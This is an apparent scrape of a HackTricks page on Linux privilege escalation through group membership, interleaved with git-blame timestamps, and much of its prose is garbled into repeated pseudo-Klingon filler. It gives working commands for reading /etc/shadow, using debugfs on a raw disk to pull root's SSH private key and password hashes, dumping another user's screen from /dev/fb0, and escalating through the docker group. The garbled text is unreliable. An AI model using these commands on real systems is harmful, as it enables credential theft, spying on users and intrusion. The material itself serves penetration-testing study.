'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej**
2020-07-15 15:43:14 +00:00
```text
sudo su
```
2024-02-10 17:52:19 +00:00
# tlhIngan Hol
2020-07-15 15:43:14 +00:00
2024-02-10 17:52:19 +00:00
Users from the **shadow** **qutlh** can **ghItlh** the ** /etc/shadow** file:
2020-07-15 15:43:14 +00:00
```text
-rw-r----- 1 root shadow 1824 Apr 26 19:10 /etc/shadow
```
2024-02-10 17:52:19 +00:00
So, **ghItlh** vItlhutlh **hashes** **ghItlh** **crack** .
2020-07-15 15:43:14 +00:00
2024-02-10 17:52:19 +00:00
# **Disk Group**
2020-07-15 15:43:14 +00:00
2024-02-10 17:52:19 +00:00
**root access** **equivalent** **privilege** **ghItlh** **vItlhutlh** **machine** **data** **ghItlh** **access** .
2020-07-15 15:43:14 +00:00
2024-02-10 17:52:19 +00:00
**Files**:`/dev/sd[a-z][1-9]`
2020-07-15 15:43:14 +00:00
```text
debugfs /dev/sda1
debugfs: cd /root
debugfs: ls
debugfs: cat /root/.ssh/id_rsa
debugfs: cat /etc/shadow
```
2024-02-10 17:52:19 +00:00
**ghItlhvam** debugfs **DIvI'** **tlhIngan Hol** **ghItlhvam** ** 'oH**. **ghItlhvam** `/tmp/asd1.txt` **ghItlhvam** `/tmp/asd2.txt` **ghItlhvam** ** 'ej** **tlhIngan Hol** **DIvI'** **ghItlhvam** ** 'oH**.
2020-07-15 15:43:14 +00:00
```bash
debugfs -w /dev/sda1
debugfs: dump /tmp/asd1.txt /tmp/asd2.txt
```
2024-02-10 17:52:19 +00:00
**However, if you try to write files owned by root** (like `/etc/shadow` or `/etc/passwd` ) you will have a "**Permission denied**" error.
2020-07-15 15:43:14 +00:00
2022-05-01 12:41:36 +00:00
# Video Group
2020-07-15 15:43:14 +00:00
Using the command `w` you can find **who is logged on the system** and it will show an output like the following one:
```bash
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
yossi tty1 22:16 5:13m 0.05s 0.04s -bash
moshe pts/1 10.10.14.44 02:53 24:07 0.06s 0.06s /bin/bash
```
2024-02-10 17:52:19 +00:00
**tty1** **yossi** **logh** **mInDu'** **machin** **terminal** ** 'e'**.
2020-07-15 15:43:14 +00:00
2024-02-10 17:52:19 +00:00
**video** **ghom** ** 'e'** **screen output** **qawHaq** . **screens** ** 'e'** **observe** ** 'e'** ** 'e'** **raw data** **grab** ** 'e'** ** 'ej** **resolution** ** 'e'** **screen** ** 'e'** **using** ** 'e'**. **screen data** ** '/dev/fb0'** **save** ** 'e'** ** 'ej** **resolution** ** 'e'** **screen** ** '/sys/class/graphics/fb0/virtual_size'** **Daj** .
2020-07-15 15:43:14 +00:00
```bash
cat /dev/fb0 > /tmp/screen.raw
cat /sys/class/graphics/fb0/virtual_size
```
2024-02-10 17:52:19 +00:00
**QaStaHvIS** **raw image** **vItlhutlh** **GIMP** **vay'** **ghItlh** ** `screen.raw` ** **file** **vay'** **Raw image data** **file type** **vay'** **ghItlh** :
2020-07-15 15:43:14 +00:00
2024-02-10 17:52:19 +00:00
**vay'** **Width** ** 'ej** **Height** **modify** ** 'ej** **screen** **vay'** **vItlhutlh** **Image Types** **check** ** 'ej** ** (screen** **vay'** **better** **vay'** **one** **select** ** 'ej)**:
2020-07-15 15:43:14 +00:00
2024-02-10 17:52:19 +00:00
# **root Group**
2020-07-15 15:43:14 +00:00
2024-02-10 17:52:19 +00:00
**root group** **members** **default** **vay'** **modify** ** 'ej** **service** **configuration files** ** 'ej** **libraries** **files** ** 'ej** **other interesting things** **escalate privileges** **vay'** **used** **vay'** ...
2020-07-15 15:43:14 +00:00
2024-02-10 17:52:19 +00:00
**root members** **files** **modify** **check** :
2020-07-15 15:43:14 +00:00
```bash
find / -group root -perm -g=w 2>/dev/null
```
2022-05-01 12:41:36 +00:00
# Docker Group
2020-07-15 15:43:14 +00:00
You can mount the root filesystem of the host machine to an instance’ `chroot` into that volume. This effectively gives you root on the machine.
{% embed url="https://github.com/KrustyHack/docker-privilege-escalation" %}
{% embed url="https://fosterelli.co/privilege-escalation-via-docker.html" %}
2022-05-01 12:41:36 +00:00
# lxc/lxd Group
2020-07-15 15:43:14 +00:00
[lxc - Privilege Escalation ](lxd-privilege-escalation.md )
2022-04-28 16:01:33 +00:00
< details >
2024-01-06 22:59:36 +00:00
< summary > < strong > Learn AWS hacking from zero to hero with< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-01-06 22:59:36 +00:00
Other ways to support HackTricks:
2022-04-28 16:01:33 +00:00
2024-01-06 22:59:36 +00:00
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS** ](https://github.com/sponsors/carlospolop )!
* Get the [**official PEASS & HackTricks swag** ](https://peass.creator-spring.com )
* Discover [**The PEASS Family** ](https://opensea.io/collection/the-peass-family ), our collection of exclusive [**NFTs** ](https://opensea.io/collection/the-peass-family )
2024-02-08 21:36:15 +00:00
* **Join the** 💬 [**Discord group** ](https://discord.gg/hRep4RUj7f ) or the [**telegram group** ](https://t.me/peass ) or **follow** us on **Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks_live )**.**
2024-01-06 22:59:36 +00:00
* **Share your hacking tricks by submitting PRs to the** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) and [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github repos.
2022-04-28 16:01:33 +00:00
< / details >
